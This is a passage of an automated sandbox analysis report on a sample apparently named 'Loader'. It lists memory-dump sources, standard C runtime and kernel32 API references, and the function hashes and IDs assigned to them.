                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                        • String ID:
                                                                                        • API String ID: 127012223-0
                                                                                        • Opcode ID: 9437d009450964ab4d747c2ba5ea6eeecdea9248b8465ab401a2db4c31c43244
                                                                                        • Instruction ID: c3a09560e5dd205b0bb28ccba162ac92b88e60e6f3c27bd95b2709011bd9b2ce
                                                                                        • Opcode Fuzzy Hash: 9437d009450964ab4d747c2ba5ea6eeecdea9248b8465ab401a2db4c31c43244
                                                                                        • Instruction Fuzzy Hash: 837125729002495BDF219F548C81BEF77EAEF49318F1C243AE814B7391E7769E028752
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3213747228-0
                                                                                        • Opcode ID: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                        • Instruction ID: dfe99e928fffa7ce087e72066855be0913542b5df3b53f7f1dcc7a54e565ff07
                                                                                        • Opcode Fuzzy Hash: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                        • Instruction Fuzzy Hash: 84B14472E083959FDB118F28CD81FEEBBA5EB55310F14516EE845BF282D2739902C7A0
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF827
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00EBF82F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF8B8
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00EBF8E3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF938
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: f0d463cc1d970a5ce183dd58c4e54be952493032089278a322d49552bc6e7d11
                                                                                        • Instruction ID: e7874163bac0d25dec843023d3e434a225053bf553999dfc1383cdef4f826a85
                                                                                        • Opcode Fuzzy Hash: f0d463cc1d970a5ce183dd58c4e54be952493032089278a322d49552bc6e7d11
                                                                                        • Instruction Fuzzy Hash: B841A530E00219ABCF14DF69CC85ADFBBE5AF45318F149166E815BB352D7319E06CB91
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00ECBE51,00EB35D2,?,00000000,?), ref: 00ECBE03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3664257935-537541572
                                                                                        • Opcode ID: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
                                                                                        • Instruction ID: 00f14e50d429b98270f2e89d429598dc420375b191302aa854fb6704c3708126
                                                                                        • Opcode Fuzzy Hash: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
                                                                                        • Instruction Fuzzy Hash: 9C210871A01259ABD7219B66EE82F9A3B589B01764F241128FD17BB2D0E731ED06C6D0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EBEB22
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00EBEB30
                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00EBEB41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                        • API String ID: 667068680-1047828073
                                                                                        • Opcode ID: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
                                                                                        • Instruction ID: 02b8541b52e14a4af18aed91a861a8fe2e05a4671fe6c1a5b6d001abfb3adff9
                                                                                        • Opcode Fuzzy Hash: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
                                                                                        • Instruction Fuzzy Hash: CDD05E759893E86F83109B73BC4E8963E94AB0426130104A9F409F61A0F3B008448B94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6223e30dbf96786a927cebade01a899510bd37290a893096e08045bd365beb6
                                                                                        • Instruction ID: fd396dc3e4292bec62739b69be470da07e33dc1a9d4aac697cae5adc33dc4fa8
                                                                                        • Opcode Fuzzy Hash: d6223e30dbf96786a927cebade01a899510bd37290a893096e08045bd365beb6
                                                                                        • Instruction Fuzzy Hash: 4AB1DF70A04249AFDB11DF98DA81BAEBBB5FF55314F14219AE404BB3D2CB719D42CB60
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B02
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EC9B10
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EC9B29
                                                                                        • SetLastError.KERNEL32(00000000,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 8e8dd99a4433173f9bf87e0e4a3aed09bc113c3852b85ad3e5f2b53a9aeb76da
                                                                                        • Instruction ID: a643fd99d7d2b49e22ed043d91c10318c9c183ccf53924271e1ab802ce909cbf
                                                                                        • Opcode Fuzzy Hash: 8e8dd99a4433173f9bf87e0e4a3aed09bc113c3852b85ad3e5f2b53a9aeb76da
                                                                                        • Instruction Fuzzy Hash: 6B016833118A157EA6242675BDCDF1B2AA4EB117B8720133EF115793F2EE134C0B8148
                                                                                        APIs
                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00ECA4DB
                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00ECA754
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 2673424686-393685449
                                                                                        • Opcode ID: ddeb69ec36410f7cf4b1d090e46ff505b6d113b2f8375d7e7ebd48cecc5291cf
                                                                                        • Instruction ID: 1e976d904edde13338274e1108761c22d7285bb28f340d53cd405d065c560b75
                                                                                        • Opcode Fuzzy Hash: ddeb69ec36410f7cf4b1d090e46ff505b6d113b2f8375d7e7ebd48cecc5291cf
                                                                                        • Instruction Fuzzy Hash: D3B17C71800209DFCF18DFA4CA45EAEB7B5BF14308F18656EE8117B212D772D952CB92
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00EC4A31,?,00EC4BE6,00000000), ref: 00EC4ABE
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EC4AD0
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00EC4A31,?,00EC4BE6,00000000), ref: 00EC4AF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
                                                                                        • Instruction ID: fb23a1b7123063497a4275b4f809554402059c0f3821f1cb24ae9015ed5cedc3
                                                                                        • Opcode Fuzzy Hash: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
                                                                                        • Instruction Fuzzy Hash: 5001F775944759EFCB118F81CC44FAE7BF8FB04B15F010229F821B66D0EB749904CA84
                                                                                        APIs
                                                                                        • __alloca_probe_16.LIBCMT ref: 00ECC59B
                                                                                        • __alloca_probe_16.LIBCMT ref: 00ECC664
                                                                                        • __freea.LIBCMT ref: 00ECC6CB
                                                                                          • Part of subcall function 00ECAD61: HeapAlloc.KERNEL32(00000000,?,?,?,00EBB9E5,?,?,00EB35D2,00001000,?,00EB351A), ref: 00ECAD93
                                                                                        • __freea.LIBCMT ref: 00ECC6DE
                                                                                        • __freea.LIBCMT ref: 00ECC6EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1096550386-0
                                                                                        • Opcode ID: f17b8ca1f20bbee67a2d884f3d1adf0a63310729b33c278218310ccb29a62a9a
                                                                                        • Instruction ID: 58374e164c93de57a2ce3a2ae43384e3de61594ccfd646972c88838af7bf094d
                                                                                        • Opcode Fuzzy Hash: f17b8ca1f20bbee67a2d884f3d1adf0a63310729b33c278218310ccb29a62a9a
                                                                                        • Instruction Fuzzy Hash: FA51A3725002066FEB219F64CE81FFB7AA9EF44B18B25252DFD09F6241E772DC528660
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFileHandleSize
                                                                                        • String ID:
                                                                                        • API String ID: 3849164406-0
                                                                                        • Opcode ID: 48966860b6e0484ab44c6916f27074d11c65ec5b41ee75758d6d9d06b69e993c
                                                                                        • Instruction ID: f60a6dfef45cca3a45d4dcb6ffcf7d20f63dc491b343636dde45050403ba8def
                                                                                        • Opcode Fuzzy Hash: 48966860b6e0484ab44c6916f27074d11c65ec5b41ee75758d6d9d06b69e993c
                                                                                        • Instruction Fuzzy Hash: 1071A0B0D04248CFCB00EFA8D59879EBBF0BF48314F508969E499AB380D734A949CF52
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EBE8FB
                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE91A
                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE948
                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9A3
                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 66001078-0
                                                                                        • Opcode ID: 5bda0e5023b3f282bf23db342ab91110c51283bf1de8449fecee63a83819132b
                                                                                        • Instruction ID: 6d2462ac76463f36a52cf0af08e895471ab0ed49af2f45fef8bd554bab05c032
                                                                                        • Opcode Fuzzy Hash: 5bda0e5023b3f282bf23db342ab91110c51283bf1de8449fecee63a83819132b
                                                                                        • Instruction Fuzzy Hash: 4F414971900606DFCB64DF65C485AEBB3F8FF84354B105AAAE456B7780E730E988CB51
                                                                                        APIs
                                                                                        • __EH_prolog3.LIBCMT ref: 00EBC05B
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00EBC066
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00EBC0D4
                                                                                          • Part of subcall function 00EBBF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EBBF75
                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00EBC081
                                                                                        • _Yarn.LIBCPMT ref: 00EBC097
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                        • String ID:
                                                                                        • API String ID: 1088826258-0
                                                                                        • Opcode ID: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
                                                                                        • Instruction ID: 9fad3bdbc61f59105ef7e97142ffbc6e59297cc44b6c37ebe1763dbf341ecaca
                                                                                        • Opcode Fuzzy Hash: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
                                                                                        • Instruction Fuzzy Hash: DF019A75A046598BC706EB208886ABE7BA1FB85710B152009F8167B391CF74AE46CBC1
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(00000000,?,00ECD392,?,?,?,00000000), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 00ECB059
                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 00ECF825
                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?), ref: 00ECF85C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                        • String ID: `/$utf8
                                                                                        • API String ID: 943130320-1698776066
                                                                                        • Opcode ID: 83014444570d30dd3a8acb30b0336da01e6b726d3532fb49d5f114b1c875a505
                                                                                        • Instruction ID: d791320c772c534f32b8addf213ff9f6e737cfd5cb08a05f2da01f7cadd8414d
                                                                                        • Opcode Fuzzy Hash: 83014444570d30dd3a8acb30b0336da01e6b726d3532fb49d5f114b1c875a505
                                                                                        • Instruction Fuzzy Hash: 85510A72600306BADF28AB70CE42FA677EAEF44704F14253EF555B7181F772E9428651
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C), ref: 00ED52CE
                                                                                        • GetLastError.KERNEL32(?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C,00000000,?,00ECAA0C), ref: 00ED52D8
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00ED5300
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 3177248105-2084034818
                                                                                        • Opcode ID: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
                                                                                        • Instruction ID: 07cf2920f4e84a5cd71d15411ade68b03aa3a259977ecd5301c1e9e676e32f96
                                                                                        • Opcode Fuzzy Hash: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
                                                                                        • Instruction Fuzzy Hash: 85E09A71280348BBEB201F62ED06F183E59AB00B85F100030FA0CBC0E4E7A2EC118544
                                                                                        APIs
                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00ED3122
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ED3374
                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ED33BA
                                                                                        • GetLastError.KERNEL32 ref: 00ED345D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                        • String ID:
                                                                                        • API String ID: 2112829910-0
                                                                                        • Opcode ID: f859d193acbb99268a32f9cc35bbe16cc2ef5ae9430ac6bdbfe578c013b9a53b
                                                                                        • Instruction ID: e5605da403aaa1f64bcebd692ed782be8495c8346b4261a6f5617927a93763f1
                                                                                        • Opcode Fuzzy Hash: f859d193acbb99268a32f9cc35bbe16cc2ef5ae9430ac6bdbfe578c013b9a53b
                                                                                        • Instruction Fuzzy Hash: 20D19AB5D042489FCB15CFA8D980AEDBBF5FF08314F28416AE426FB351D630AA46CB51
                                                                                        APIs
                                                                                        Memory Dump Source
